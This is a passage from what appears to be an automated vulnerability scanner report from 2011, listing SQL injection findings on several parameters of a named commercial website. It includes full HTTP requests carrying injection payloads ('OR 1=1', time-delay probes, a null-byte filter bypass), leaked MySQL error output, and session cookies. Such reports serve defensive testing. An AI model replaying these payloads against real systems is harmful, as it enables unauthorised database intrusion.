Cookie: PHPSESSID=hgc9rjnd7h8m13cstfaoccjfg0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7190
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'='1&attributeId_422[]=2742__None currently&attributeId_487[]=3199__Not sure&at' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421='+OR+'1'%3d'1&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=hgc9rjnd7h8m13cstfaoccjfg0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:19:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.327. http://www.insideup.com/ppc/leadflow/hins00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the address parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--'%20and%201%3d1--%20&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:20 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v5m3ilr8nucui2cd0b0frvhjk1; path=/
Content-Length: 7406
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--' and 1=1-- &attributeId_342_g=2017__Accounting/Finance' at line 5

1.328. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:12:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT pg_sleep(30)--&attributeId_421=2739__No&attributeId_422[]=2742__None curr' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:12:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.329. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_342_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=shvvhe4cbn0b8srqtfrkmfu914; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance'&attributeI' at line 5

1.330. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:12:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT pg_sleep(30)--&attributeId_421=2739__No&attributeId_422[]=2742__None curr' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:12:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.331. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_343_g parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qn02cu10uq6d92mh6nck5g7ap4; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.332. http://www.insideup.com/ppc/leadflow/hins00/project.php [attributeId_344_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The attributeId_344_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_344_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR%00'&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_t=&attributeId_493_t=&attributeId_514_t=&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=bg5bamf9r296qlbk2sumhl6ko7; JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 